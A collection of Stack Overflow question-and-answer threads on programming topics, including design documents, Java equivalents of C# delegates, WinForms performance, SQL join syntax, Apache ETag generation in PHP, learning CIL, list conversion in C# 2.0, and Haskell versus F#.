Console.WriteLine(GetTypeName(obj: null)); // System.ArgumentNullException
You can read more about the new feature here.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44905",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "149"
} |
Q: What essential design artifacts do you produce? In the course of your software development lifecycle, what essential design artifacts do you produce? What makes them essential to your practice?
The project I'm currently on has been in production for 8+ years. This web application has been actively enhanced and maintained over that time. While we have CMMI based policies and processes in place, with portions of our practice being well defined, the design phase has been largely overlooked. Best practices, anyone?
A: Working code...and whiteboard drawings.
:P
A: Having worked on a lot of waterfall projects in the past and a lot of adhoc and agile projects more recently, there's a number of design artifacts I like to create although I can't state enough that it really depends on the details of the project (methodology/team structure/timescale/tools etc).
For a generic, server-based 'enterprise application' I'd want the bare minimum to be something along these lines:
*
*A detailed functional design document (aka spec). Generally something along the lines of Joel's WhatsTimeIsIt example spec, although probably with some UML use-case diagrams.
*A software technical design document. Not necessarily detailed for 100% system coverage but detailed in all the key areas and containing all the design decisions. Being a bit of a UML freak it'd be nice to see lots of pictures along the lines of package diagrams, component diagrams, key feature class diagrams, and probably some sequence diagrams thrown in for good measure.
*An infrastructure design document. Probably with a UML deployment diagram for the conceptual design and perhaps a network diagram for something more physical.
When I say document, any of the above might be broken down into multiple documents, or perhaps stored on a wiki/some other tool.
As for their usefulness, my philosophy has always been that a development team should always be able to hand over an application to a support team without having to hand over their phone numbers. If the design artifacts don't clearly indicate what the application does, how it does it, and where it does it, then you know the support team are going to give the app the same care and attention they would a rabid dog.
I should mention I'm not advocating the practice of handing software over from a dev team to a support team once it's finished, which raises all manner of interesting issues; I'm just saying it should be possible if the management so desired.
A: Designs change so much during development and afterwards that most of my carefully crafted documents rot away in source control and become almost more of a hindrance than a help, once code is in production. I see design documents as necessary to good communication and to clarify your thinking while you develop something, but after that it takes a herculean effort to keep them properly maintained.
I do take pictures of whiteboards and save the JPEGs to source control. Those are some of my best design docs!
A: In our model (which is fairly specific to business process applications) the design artefacts include:
*
*a domain data model, with comments on each entity and attribute
*a properties file listing all the modify and create triggers on each entity, calculated attributes, validators and other business logic
*a set of screen definitions (view model)
However do these really count as design artefacts? Our framework is such that these definitions are used to generate the actual code of the system, so maybe they go beyond design.
But the fact that they serve double duty is powerful because they are, by definition, up to date and synchronised with the code at all times.
A: This is not a design document, per se, but our unit tests serve the dual purpose of "describing" how the code they test is supposed to function. The nice part about this is that they never get out of date, since our unit tests must pass for our build to succeed.
A: I don't think anything can take the place of a good old fashioned design spec for the following reasons:
*
*It serves as a means of communicating how you will build an application to others.
*It lets you get ideas out of your head so you don't worry about tracking a million things at the same time.
*If you have to pause a project and return to it later you're not starting your thought process over again.
I like to see various bits of info in a design spec:
*
*General explanation of your approach to the challenge at hand
*How will you monitor your application?
*What are the security concerns and how are they addressed?
*Flowcharts / sequence diagrams
*Open issues
*Known limitations
Unit tests, while a fantastic and arguably critical item to include in your application development, don't cover all of these topics.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44909",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Java Delegates? Does the Java language have delegate features, similar to how C# has support for delegates?
A: Depending precisely what you mean, you can achieve a similar effect (passing around a method) using the Strategy Pattern.
Instead of a line like this declaring a named method signature:
// C#
public delegate void SomeFunction();
declare an interface:
// Java
public interface ISomeBehaviour {
void SomeFunction();
}
For concrete implementations of the method, define a class that implements the behaviour:
// Java
public class TypeABehaviour implements ISomeBehaviour {
public void SomeFunction() {
// TypeA behaviour
}
}
public class TypeBBehaviour implements ISomeBehaviour {
public void SomeFunction() {
// TypeB behaviour
}
}
Then wherever you would have had a SomeFunction delegate in C#, use an ISomeBehaviour reference instead:
// C#
SomeFunction doSomething = SomeMethod;
doSomething();
doSomething = SomeOtherMethod;
doSomething();
// Java
ISomeBehaviour someBehaviour = new TypeABehaviour();
someBehaviour.SomeFunction();
someBehaviour = new TypeBBehaviour();
someBehaviour.SomeFunction();
With anonymous inner classes, you can even avoid declaring separate named classes and almost treat them like real delegate functions.
// Java
public void SomeMethod(ISomeBehaviour pSomeBehaviour) {
...
}
...
SomeMethod(new ISomeBehaviour() {
@Override
public void SomeFunction() {
// your implementation
}
});
This should probably only be used when the implementation is very specific to the current context and wouldn't benefit from being reused.
And then of course in Java 8, these do become basically lambda expressions:
// Java 8
SomeMethod(() -> { /* your implementation */ });
A: No, but they're fakeable using proxies and reflection:
public static class TestClass {
public String knockKnock() {
return "who's there?";
}
}
private final TestClass testInstance = new TestClass();
@Test public void
can_delegate_a_single_method_interface_to_an_instance() throws Exception {
Delegator<TestClass, Callable<String>> knockKnockDelegator = Delegator.ofMethod("knockKnock")
.of(TestClass.class)
.to(Callable.class);
Callable<String> callable = knockKnockDelegator.delegateTo(testInstance);
assertThat(callable.call(), is("who's there?"));
}
The nice thing about this idiom is that you can verify that the delegated-to method exists, and has the required signature, at the point where you create the delegator (although not at compile-time, unfortunately, although a FindBugs plug-in might help here), then use it safely to delegate to various instances.
See the karg code on github for more tests and implementation.
A: Short story: no.
Introduction
The newest version of the Microsoft Visual J++ development environment
supports a language construct called delegates or bound method
references. This construct, and the new keywords delegate and
multicast introduced to support it, are not a part of the JavaTM
programming language, which is specified by the Java Language
Specification and amended by the Inner Classes Specification included
in the documentation for the JDKTM 1.1 software.
It is unlikely that the Java programming language will ever include
this construct. Sun already carefully considered adopting it in 1996,
to the extent of building and discarding working prototypes. Our
conclusion was that bound method references are unnecessary and
detrimental to the language. This decision was made in consultation
with Borland International, who had previous experience with bound
method references in Delphi Object Pascal.
We believe bound method references are unnecessary because another
design alternative, inner classes, provides equal or superior
functionality. In particular, inner classes fully support the
requirements of user-interface event handling, and have been used to
implement a user-interface API at least as comprehensive as the
Windows Foundation Classes.
We believe bound method references are harmful because they detract
from the simplicity of the Java programming language and the
pervasively object-oriented character of the APIs. Bound method
references also introduce irregularity into the language syntax and
scoping rules. Finally, they dilute the investment in VM technologies
because VMs are required to handle additional and disparate types of
references and method linkage efficiently.
A: Have you read this :
Delegates are a useful construct in event-based systems. Essentially
Delegates are objects that encode a method dispatch on a specified
object. This document shows how java inner classes provide a more
generic solution to such problems.
What is a Delegate? Really it is very similar to a pointer to member
function as used in C++. But a delegate contains the target object
alongwith the method to be invoked. Ideally it would be nice to be
able to say:
obj.registerHandler(ano.methodOne);
...and that the method methodOne would be called on ano when some specific event was received.
This is what the Delegate structure achieves.
Java Inner Classes
It has been argued that Java provides this
functionality via anonymous inner classes and thus does not need the additional
Delegate construct.
obj.registerHandler(new Handler() {
public void handleIt(Event ev) {
methodOne(ev);
}
} );
At first glance this seems correct but at the same time a nuisance.
Because for many event processing examples the simplicity of the
Delegates syntax is very attractive.
General Handler
However, if event-based programming is used in a more
pervasive manner, say, for example, as a part of a general
asynchronous programming environment, there is more at stake.
In such a general situation, it is not sufficient to include only the
target method and target object instance. In general there may be
other parameters required, that are determined within the context when
the event handler is registered.
In this more general situation, the java approach can provide a very
elegant solution, particularly when combined with use of final
variables:
void processState(final T1 p1, final T2 dispatch) {
final int a1 = someCalculation();
m_obj.registerHandler(new Handler() {
public void handleIt(Event ev) {
dispatch.methodOne(a1, ev, p1);
}
} );
}
final * final * final
Got your attention?
Note that the final variables are accessible from within the anonymous
class method definitions. Be sure to study this code carefully to
understand the ramifications. This is potentially a very powerful
technique. For example, it can be used to good effect when registering
handlers in MiniDOM and in more general situations.
By contrast, the Delegate construct does not provide a solution for
this more general requirement, and as such should be rejected as an
idiom on which designs can be based.
A: I have implemented callback/delegate support in Java using reflection. Details and working source are available on my website.
How It Works
There is a principal class named Callback with a nested class named WithParms. The API which needs the callback will take a Callback object as a parameter and, if necessary, create a Callback.WithParms as a method variable. Since a great many of the applications of this object will be recursive, this works very cleanly.
With performance still a high priority to me, I didn't want to be required to create a throwaway object array to hold the parameters for every invocation - after all in a large data structure there could be thousands of elements, and in a message processing scenario we could end up processing thousands of data structures a second.
In order to be threadsafe the parameter array needs to exist uniquely for each invocation of the API method, and for efficiency the same one should be used for every invocation of the callback; I needed a second object which would be cheap to create in order to bind the callback with a parameter array for invocation. But, in some scenarios, the invoker would already have the parameter array for other reasons. For these two reasons, the parameter array does not belong in the Callback object. Also the choice of invocation (passing the parameters as an array or as individual objects) belongs in the hands of the API using the callback, enabling it to use whichever invocation is best suited to its inner workings.
The WithParms nested class, then, is optional and serves two purposes, it contains the parameter object array needed for the callback invocations, and it provides 10 overloaded invoke() methods (with from 1 to 10 parameters) which load the parameter array and then invoke the callback target.
What follows is an example using a callback to process the files in a directory tree. This is an initial validation pass which just counts the files to process and ensures none exceeds a predetermined maximum size. In this case we just create the callback inline with the API invocation. However, we reflect the target method out as a static value so that the reflection is not done every time.
static private final Method COUNT = Callback.getMethod(Xxx.class,"callback_count",true,File.class,File.class);
...
IoUtil.processDirectory(root,new Callback(this,COUNT),selector);
...
private void callback_count(File dir, File fil) {
if(fil!=null) { // file is null for processing a directory
fileTotal++;
if(fil.length()>fileSizeLimit) {
throw new Abort("Failed","File size exceeds maximum of "+TextUtil.formatNumber(fileSizeLimit)+" bytes: "+fil);
}
}
progress("Counting",dir,fileTotal);
}
IoUtil.processDirectory():
/**
* Process a directory using callbacks. To interrupt, the callback must throw an (unchecked) exception.
* Subdirectories are processed only if the selector is null or selects the directories, and are done
* after the files in any given directory. When the callback is invoked for a directory, the file
* argument is null;
* <p>
* The callback signature is:
* <pre> void callback(File dir, File ent);</pre>
* <p>
* @return The number of files processed.
*/
static public int processDirectory(File dir, Callback cbk, FileSelector sel) {
return _processDirectory(dir,new Callback.WithParms(cbk,2),sel);
}
static private int _processDirectory(File dir, Callback.WithParms cbk, FileSelector sel) {
int cnt=0;
if(!dir.isDirectory()) {
if(sel==null || sel.accept(dir)) { cbk.invoke(dir.getParent(),dir); cnt++; }
}
else {
cbk.invoke(dir,(Object[])null);
File[] lst=(sel==null ? dir.listFiles() : dir.listFiles(sel));
if(lst!=null) {
for(int xa=0; xa<lst.length; xa++) {
File ent=lst[xa];
if(!ent.isDirectory()) {
cbk.invoke(dir,ent);
lst[xa]=null;
cnt++;
}
}
for(int xa=0; xa<lst.length; xa++) {
File ent=lst[xa];
if(ent!=null) { cnt+=_processDirectory(ent,cbk,sel); }
}
}
}
return cnt;
}
This example illustrates the beauty of this approach - the application specific logic is abstracted into the callback, and the drudgery of recursively walking a directory tree is tucked nicely away in a completely reusable static utility method. And we don't have to repeatedly pay the price of defining and implementing an interface for every new use. Of course, the argument for an interface is that it is far more explicit about what to implement (it's enforced, not simply documented) - but in practice I have not found it to be a problem to get the callback definition right.
Defining and implementing an interface is not really so bad (unless you're distributing applets, as I am, where avoiding creating extra classes actually matters), but where this really shines is when you have multiple callbacks in a single class. Not only is being forced to push them each into a separate inner class added overhead in the deployed application, but it's downright tedious to program and all that boiler-plate code is really just "noise".
A: Yes & no, but the delegate pattern in Java could be thought of this way. This video tutorial is about data exchange between an activity and fragments, and it captures the essence of a delegate-like pattern using interfaces.
A: It doesn't have an explicit delegate keyword as C#, but you can achieve similar in Java 8 by using a functional interface (i.e. any interface with exactly one method) and lambda:
private interface SingleFunc {
void printMe();
}
public static void main(String[] args) {
SingleFunc sf = () -> {
System.out.println("Hello, I am a simple single func.");
};
SingleFunc sfComplex = () -> {
System.out.println("Hello, I am a COMPLEX single func.");
};
delegate(sf);
delegate(sfComplex);
}
private static void delegate(SingleFunc f) {
f.printMe();
}
Every new object of type SingleFunc must implement printMe(), so it is safe to pass it to another method (e.g. delegate(SingleFunc)) to call the printMe() method.
A: Not really, no.
You may be able to achieve the same effect by using reflection to get Method objects you can then invoke, and the other way is to create an interface with a single 'invoke' or 'execute' method, and then instantiate them to call the method your interested in (i.e. using an anonymous inner class).
You might also find this article interesting / useful : A Java Programmer Looks at C# Delegates (@blueskyprojects.com)
A: I know this post is old, but Java 8 has added lambdas, and the concept of a functional interface, which is any interface with only one method. Together these offer similar functionality to C# delegates. See here for more info, or just google Java Lambdas.
http://cr.openjdk.java.net/~briangoetz/lambda/lambda-state-final.html
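For example, a built-in functional interface plus a method reference gets you very close to a C# delegate. (A hedged sketch; the Greeter class is made up for illustration.)
import java.util.function.Supplier;

class Greeter {
    String greet() { return "hello"; }
}

public class Demo {
    public static void main(String[] args) {
        Greeter g = new Greeter();
        Supplier<String> delegate = g::greet; // effectively a bound method reference
        System.out.println(delegate.get());   // prints "hello"
    }
}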
A: While it is nowhere near as clean, you could implement something like C# delegates using a Java Proxy.
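A minimal sketch of that idea, assuming a single-method interface and omitting error handling (the interface and class names are illustrative):
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;

interface StringCallback { String call(String arg); }

class ProxyDelegates {
    // Binds the public method 'methodName(String)' on 'target' to the interface.
    static StringCallback delegateTo(final Object target, String methodName) throws NoSuchMethodException {
        final Method m = target.getClass().getMethod(methodName, String.class);
        return (StringCallback) Proxy.newProxyInstance(
                StringCallback.class.getClassLoader(),
                new Class<?>[] { StringCallback.class },
                new InvocationHandler() {
                    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
                        return m.invoke(target, args); // forward the call reflectively
                    }
                });
    }
}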
A: No, but it has similar behavior, internally.
In C#, delegates are used to create a separate entry point and they work much like a function pointer.
In Java there is no such thing as a function pointer (at first glance), but internally Java needs to do the same thing in order to achieve these objectives.
For example, creating threads in Java requires a class extending Thread or implementing Runnable, because a class object variable can be used as a pointer to a memory location.
A: No, Java doesn't have that amazing feature. But you could create it manually using the observer pattern. Here is an example:
Write C# delegate in java
A: The code described offers many of the advantages of C# delegates. Methods, either static or dynamic, can be treated in a uniform manner. The complexity in calling methods through reflection is reduced and the code is reusable, in the sense of requiring no additional classes in the user code. Note we are calling an alternate convenience version of invoke, where a method with one parameter can be called without creating an object array. Java code below:
class Class1 {
public void show(String s) { System.out.println(s); }
}
class Class2 {
public void display(String s) { System.out.println(s); }
}
// allows static method as well
class Class3 {
public static void staticDisplay(String s) { System.out.println(s); }
}
public class TestDelegate {
public static final Class[] OUTPUT_ARGS = { String.class };
public final Delegator DO_SHOW = new Delegator(OUTPUT_ARGS,Void.TYPE);
public static void main(String[] args) {
Delegate[] items = new Delegate[3];
items[0] = DO_SHOW.build(new Class1(), "show");
items[1] = DO_SHOW.build(new Class2(), "display");
items[2] = DO_SHOW.build(Class3.class, "staticDisplay");
for(int i = 0; i < items.length; i++) {
items[i].invoke("Hello World");
}
}
}
A: Java doesn't have delegates and is proud of it :). From what I read here I found in essence 2 ways to fake delegates:
1. reflection;
2. inner class
Reflection is slooooow! Inner classes do not cover the simplest use-case: a sort function. I don't want to go into details, but the solution with inner classes is basically to create a wrapper class for an array of integers to be sorted in ascending order and a class for an array of integers to be sorted in descending order.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44912",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "222"
} |
Q: Windows Forms Application Performance My app has many controls on its surface, and more are added dynamically at runtime.
Although I am using tabs to limit the number of controls shown, and double-buffering too, it still flickers and stutters when it has to redraw (resize, maximize, etc.).
What are your tips and tricks to improve WinForms app performance?
A: I know of two things you can do but they don't always apply to all situations.
*
*You're going to get better performance if you're using absolute positioning for each control (myNewlyCreatedButton.Location.X/Y) as opposed to using a flow layout panel or a table layout panel. WinForms has to do a lot less math trying to figure out where controls should be placed.
*If there is a single operation in which you're adding/removing/modifying a lot of controls, call "SuspendLayout()" on the container of the affected controls (whether it is a panel or the whole form), and when you're done with your work call "ResumeLayout()" on the same container. If you don't, the form will have to do a layout pass each and every time you add/remove/modify a control, which costs a lot more time. see: http://msdn.microsoft.com/en-us/library/system.windows.forms.control.suspendlayout(VS.80).aspx
Although, I'm not sure how these approaches could apply when resizing a window.
A: Although more general than some of the other tips, here is mine:
When using a large number of "items", try to avoid creating a control for each one of them; rather, reuse the controls. For example if you have 10 000 items, each corresponding to a button, it is very easy to (programmatically) create 10 000 buttons and wire up their event handlers, such that when you enter the event handler, you know exactly which element you must work on. However it is much more efficient if you create, let's say, 500 buttons (because you know that only 500 buttons will be visible on the screen at any one time) and introduce a "mapping layer" between the buttons and the items, which dynamically reassigns the buttons to different items every time the user does something which would result in changing the set of buttons which should be visible (like moving a scrollbar for example).
A:
Although, I'm not sure how these approaches could apply when resizing a window.
Handle the ResizeBegin and ResizeEnd events to call SuspendLayout() and ResumeLayout(). These events are only on the System.Windows.Forms.Form class (although I wish they were also on Control).
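A minimal sketch of that suggestion (the form name is illustrative); anonymous delegates keep it C# 2.0-friendly:
public partial class MainForm : Form
{
    public MainForm()
    {
        InitializeComponent();

        // Skip layout passes while the user drags the resize handle,
        // then force a single layout pass when they let go.
        this.ResizeBegin += delegate { this.SuspendLayout(); };
        this.ResizeEnd += delegate { this.ResumeLayout(true); };
    }
}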
A: Are you making good use of SuspendLayout() and ResumeLayout()?
http://msdn.microsoft.com/en-us/library/system.windows.forms.control.suspendlayout(VS.80).aspx
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44914",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: Explicit vs implicit SQL joins Is there any efficiency difference in an explicit vs implicit inner join?
For example:
SELECT * FROM
table a INNER JOIN table b
ON a.id = b.id;
vs.
SELECT a.*, b.*
FROM table a, table b
WHERE a.id = b.id;
A: On MySQL 5.1.51, both queries have identical execution plans:
mysql> explain select * from table1 a inner join table2 b on a.pid = b.pid;
+----+-------------+-------+------+---------------+------+---------+--------------+------+-------+
| id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra |
+----+-------------+-------+------+---------------+------+---------+--------------+------+-------+
| 1 | SIMPLE | b | ALL | PRIMARY | NULL | NULL | NULL | 986 | |
| 1 | SIMPLE | a | ref | pid | pid | 4 | schema.b.pid | 70 | |
+----+-------------+-------+------+---------------+------+---------+--------------+------+-------+
2 rows in set (0.02 sec)
mysql> explain select * from table1 a, table2 b where a.pid = b.pid;
+----+-------------+-------+------+---------------+------+---------+--------------+------+-------+
| id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra |
+----+-------------+-------+------+---------------+------+---------+--------------+------+-------+
| 1 | SIMPLE | b | ALL | PRIMARY | NULL | NULL | NULL | 986 | |
| 1 | SIMPLE | a | ref | pid | pid | 4 | schema.b.pid | 70 | |
+----+-------------+-------+------+---------------+------+---------+--------------+------+-------+
2 rows in set (0.00 sec)
table1 has 166208 rows; table2 has about 1000 rows.
This is a very simple case; it doesn't by any means prove that the query optimizer wouldn't get confused and generate different plans in a more complicated case.
A: @lomaxx: Just to clarify, I'm pretty certain that both of the above syntaxes are supported by SQL Server 2005. The syntax below is NOT supported however:
select a.*, b.*
from table a, table b
where a.id *= b.id;
Specifically, the outer join (*=) is not supported.
A:
Performance wise, they are exactly the same (at least in SQL Server) but be aware that they are deprecating this join syntax and it's not supported by sql server2005 out of the box.
I think you are thinking of the deprecated *= and =* operators vs. "outer join".
I have just now tested the two formats given, and they work properly on a SQL Server 2008 database. In my case they yielded identical execution plans, but I couldn't confidently say that this would always be true.
A: The second syntax has the unwanted possibility of a cross join: you can add tables to the FROM part without a corresponding WHERE clause. This is considered harmful.
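For example, nothing stops you from writing this with the implicit syntax; it silently pairs every row of a with every row of b:
-- Missing WHERE clause: silently a cross join, probably a bug.
SELECT a.*, b.*
FROM table_a a, table_b b;

-- The explicit syntax forces the join condition to be stated up front:
SELECT a.*, b.*
FROM table_a a
INNER JOIN table_b b ON a.id = b.id;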
A: On some databases (notably Oracle) the order of the joins can make a huge difference to query performance (if there are more than two tables). On one application, we had literally two orders of magnitude difference in some cases. Using the inner join syntax gives you control over this - if you use the right hints syntax.
You didn't specify which database you're using, but probability suggests SQL Server or MySQL where there it makes no real difference.
A: As Leigh Caldwell has stated, the query optimizer can produce different query plans based on what functionally looks like the same SQL statement. For further reading on this, have a look at the following two blog postings:-
One posting from the Oracle Optimizer Team
Another posting from the "Structured Data" blog
I hope you find this interesting.
A: Basically, the difference between the two is that one is written in the old way, while the other is written in the modern way. Personally, I prefer the modern script using the inner, left, outer, right definitions because they are more explanatory and makes the code more readable.
When dealing with inner joins there is no real difference in readability either; however, it may get complicated when dealing with left and right joins, as in the older method you would get something like this:
SELECT *
FROM table a, table b
WHERE a.id = b.id (+);
The above is the old way how a left join is written as opposed to the following:
SELECT *
FROM table a
LEFT JOIN table b ON a.id = b.id;
As you can visually see, the modern way of how the script is written makes the query more readable. (By the way same goes for right joins and a little more complicated for outer joins).
Going back to the boiler plate, it doesn't make a difference to the SQL compiler how the query is written as it handles them in the same way. I've seen a mix of both in Oracle databases which have had many people writing into it, both elder and younger ones. Again, it boils down to how readable the script is and the team you are developing with.
A: The first answer you gave uses what is known as ANSI join syntax, the other is valid and will work in any relational database.
I agree with grom that you should use ANSI join syntax. As they said, the main reason is for clarity. Rather than having a where clause with lots of predicates, some of which join tables and others restricting the rows returned with the ANSI join syntax you are making it blindingly clear which conditions are being used to join your tables and which are being used to restrict the results.
A: Performance-wise, they are exactly the same (at least in SQL Server).
PS: Be aware that the "implicit OUTER JOIN" syntax--using *= or =* in a WHERE after using comma--is deprecated since SQL Server 2005. (The "implicit (CROSS) JOIN" syntax using comma as used in the question is still supported.)
Deprecation of "Old Style" JOIN Syntax: Only A Partial Thing
A: Personally I prefer the join syntax as it makes it clearer that the tables are joined and how they are joined. Try comparing larger SQL queries where you are selecting from 8 different tables and you have lots of filtering in the where clause. By using join syntax you separate out the parts where the tables are joined from the part where you are filtering the rows.
A: Performance wise, it should not make any difference. The explicit join syntax seems cleaner to me as it clearly defines relationships between tables in the from clause and does not clutter up the where clause.
A: In my experience, using the cross-join-with-a-where-clause syntax often produces a brain damaged execution plan, especially if you are using a Microsoft SQL product. The way that SQL Server attempts to estimate table row counts, for instance, is savagely horrible. Using the inner join syntax gives you some control over how the query is executed. So from a practical point of view, given the atavistic nature of current database technology, you have to go with the inner join.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44917",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "477"
} |
Q: How do you make an etag that matches Apache? I want to make an etag that matches what Apache produces. How does apache create it's etags?
A: One thing to remember about Apache's Etags is that they don't play well in clusters because they include inode information that can—and probably will—vary between machines in the same cluster.
A: Apache uses the standard format of inode-filesize-mtime. The only caveat to this is that the mtime must be epoch time and padded with zeros so it is 16 digits. Here is how to do it in PHP:
$fs = stat($file);
header("Etag: ".sprintf('"%x-%x-%s"', $fs['ino'], $fs['size'],base_convert(str_pad($fs['mtime'],16,"0"),10,16)));
A: If you're dynamically generating your page though, this probably won't make sense. If you're in PHP, you can pick the inode and file size of the main script, but the modify time won't tell you if your data has changed. Unless you have a good caching process or just generate static pages, etags aren't helpful. If you do have a good caching process, the inode and file size are probably irrelevant.
Edit: For people who don't know what etags are - they're just supposed to be a value that changes when the content has changed, for caching purposes. The browser gets the etag from the web server, compares it to the etag for its cached copy and then fetches the whole page if the etag has changed.
A: the answer above (from Chris) works well, but can be simplified using an implicit cast in the sprintf:
sprintf('"%x-%x-%x"', $s['ino'], $s['size'], str_pad($s['mtime'], 16, "0"));
The suggested %016x doesn't work because the padding is applied after the conversion to hex, rather than before.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44937",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "13"
} |
Q: Learning CIL Does anybody know any good resources for learning how to program CIL with in-depth descriptions of commands, etc.? I have looked around but not found anything particularly good.
A: Expert .NET 2.0 IL Assembler rocks because the author writes well and includes every freaking detail you can imagine. It doesn't hurt that he wrote the IL assembler, disassembler and validator. Best of all you can buy it in a PDF instead of a dead tree.
Masochists interested in compiler development will also enjoy Compiling for the .NET Common Language Runtime by John Gough. I found this book immensely helpful during a virtual machine development project where I "stole" lots of ideas from the CLR design.
A: The only CIL book on my shelf is Expert .NET 2.0 IL Assembler by Serge Lidin. In terms of what the individual opcodes do or mean, the Microsoft documentation on System.Reflection.Emit has some pretty good information. And it's always useful to look at existing IL with Reflector.
Edit: CIL (and indeed the CLR in general) has not changed at all between .NET 2.0 and .NET 3.5 -- the underlying runtime is basically the same, modulo fixes and performance improvements. So there's nothing newer available on a CIL level than what would be in a book on 2.0
A: Expert .NET 2.0 IL Assembler by Serge Lidin
There was a 1.1 version of the same book, but I haven't seen anything for the latest .NET release. It's an excellent book. I used it to write an OCR component in MSIL, as a learning project.
[Edit] @Curt is right, 3.0 and 3.5 are just extensions to 2.0, I hadn't plugged that in to my head yet. Now I've thought of a fun geek project... compare the disassembly of standard 2.0 code to the new LINQ/Lambda way of performing common tasks like filtering lists. For some reason I assumed that the magic was happening in new IL features, not just the compiler.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44940",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: Cast List to List in .NET 2.0 Can you cast a List<int> to List<string> somehow?
I know I could loop through and .ToString() the thing, but a cast would be awesome.
I'm in C# 2.0 (so no LINQ).
A: Is C# 2.0 able to do List<T>.ConvertAll? If so, I think your best guess would be to use that with a delegate:
List<int> list = new List<int>();
list.Add(1);
list.Add(2);
list.Add(3);
List<string> strings = list.ConvertAll<string>(delegate(int i) { return i.ToString(); });
Something along those lines.
Glenn's answer is probably the correct code ;-)
A: You can use:
List<int> items = new List<int>(new int[] { 1,2,3 } );
List<string> s = (from i in items select i.ToString()).ToList();
A: You wouldn't be able to directly cast it as no explicit or implicit cast exists from int to string, it would have to be a method involving .ToString() such as:-
foreach (int i in intList) stringList.Add(i.ToString());
Edit - or as others have pointed out rather brilliantly, use intList.ConvertAll(delegate(int i) { return i.ToString(); });, however clearly you still have to use .ToString() and it's a conversion rather than a cast.
A: result = listOfInt.Select(i => i.ToString(CultureInfo.InvariantCulture)).ToList()
replace result and listOfInt with your own names
A: Converting from an int List to a string List can be done in two additional ways besides the usual ToString(). Choose the one that pleases you more.
var stringlist = intlist.Select(x=>""+x).ToList();
Or also:
var stringlist = intlist.Select(x=>$"{x}").ToList();
And finally the traditional:
var stringlist = intlist.Select(x=>x.ToString()).ToList();
A: .NET 2.0 has the ConvertAll method where you can pass in a converter function:
List<int> l1 = new List<int>(new int[] { 1, 2, 3 } );
List<string> l2 = l1.ConvertAll<string>(delegate(int i) { return i.ToString(); });
A: Updated for 2010
List<int> l1 = new List<int>(new int[] { 1,2,3 } );
List<string> l2 = l1.ConvertAll<string>(x => x.ToString());
A: You have to build a new list. The underlying bit representations of List<int> and List<string> are completely incompatible -- on a 64-bit platform, for instance, the individual members aren't even the same size.
It is theoretically possible to treat a List<string> as a List<object> -- this gets you into the exciting worlds of covariance and contravariance, and is not currently supported by C# or VB.NET.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44942",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "101"
} |
Q: What are the primary differences between Haskell and F#? I've searched on the Internet for comparisons between F# and Haskell but haven't found anything really definitive. What are the primary differences and why would I want to choose one over the other?
A: Big differences:
*
*Platform
*Object orientation
*Laziness
The similarities are more important than the differences. Basically, you should use F# if you are on .NET already, Haskell otherwise. Also, OO and laziness mean that F# is closer to what you (probably) already know, so it is probably easier to learn.
Platform : Haskell has its own runtime, F# uses .NET. I don't know what the performance difference is, although I suspect the average code is about the same before optimisation. F# has the advantage if you need the .NET libraries.
Object orientation : F# has OO, and is very careful to make sure that .NET classes are easy to use even if your code isn't OO. Haskell has type classes which let you do something like OO, in a weird sort of way. They are like Ruby mixins crossed with Common Lisp generic functions. They're a little like Java/C# interfaces.
Laziness : Haskell is lazy, F# is not. Laziness enables some nice tricks and makes some things that look slow actually execute fast. But I find it a lot harder to guess how fast my code will run. Both languages let you use the other model, you just have to be explicit about it in your code.
Minor differences:
*
*Syntax : Haskell has slightly nicer syntax in my opinion. It's a little more terse and regular, and I like declaring types on a separate line. YMMV.
*Tools : F# has excellent Visual Studio integration, if you like that sort of thing. Haskell also has an older Visual Studio plugin, but I don't think it ever got out of beta. Haskell has a simple emacs mode, and you can probably use OCaml's tuareg-mode to edit F#.
*Side effects : Both languages make it pretty obvious when you are mutating variables. But Haskell's compiler also forces you to mark side effects whenever you use them. The practical difference is that you have to be a lot more aware of when you use libraries with side effects as well.
A: F# is part of the ML family of languages and is very close to OCaml. You may want to read this discussion on the differences between Haskell and OCaml.
A: A major difference, which is probably a result of the purity but which I see mentioned less often, is the pervasive use of monads.
Monads provide something seen in a much more limited way in other languages: abstraction of flow control. They're incredibly useful and elegant ways of doing all sorts of things, and a year of Haskell has entirely changed the way I program, in the same way that moving from imperative to OO programming many years ago changed it, or, much later, using higher-order functions did.
Unfortunately, there's no way in a space like this to provide enough understanding to let you see what the difference is. In fact, no amount of writing will do it; you simply have to spend enough time learning and writing code to gain a real understanding.
As well, F# sometimes may become slightly less functional or more awkward (from the functional programming point of view) when you interface with the .NET platform/libraries, as the libraries were obviously designed from an OO point of view.
So you might consider your decision this way: are you looking to try out one of these languages in order to get a quick, relatively small increment of improvement, or are you willing to put in more time and get less immediate benefit for something bigger in the long term. (Or, at least, if you don't get something bigger, the easy ability to switch to the other quickly?) If the former, F# is your choice, if the latter, Haskell.
A couple of other unrelated points:
Haskell has slightly nicer syntax, which is no surprise, since the designers of Haskell knew ML quite well. However, F#'s 'light' syntax goes a long way toward improving ML syntax, so there's not a huge gap there.
In terms of platforms, F# is of course .NET; how well that will work on Mono I don't know. GHC compiles to machine code with its own runtime, working well under both Windows and Unix, which compares to .NET in the same way, that, say, C++ does. This can be an advantage in some circumstances, especially in terms of speed and lower-level machine access. (I had no problem writing a DDE server in Haskell/GHC, for example; I don't think you could do that in any .NET language, and regardless, MS certainly doesn't want you doing that.)
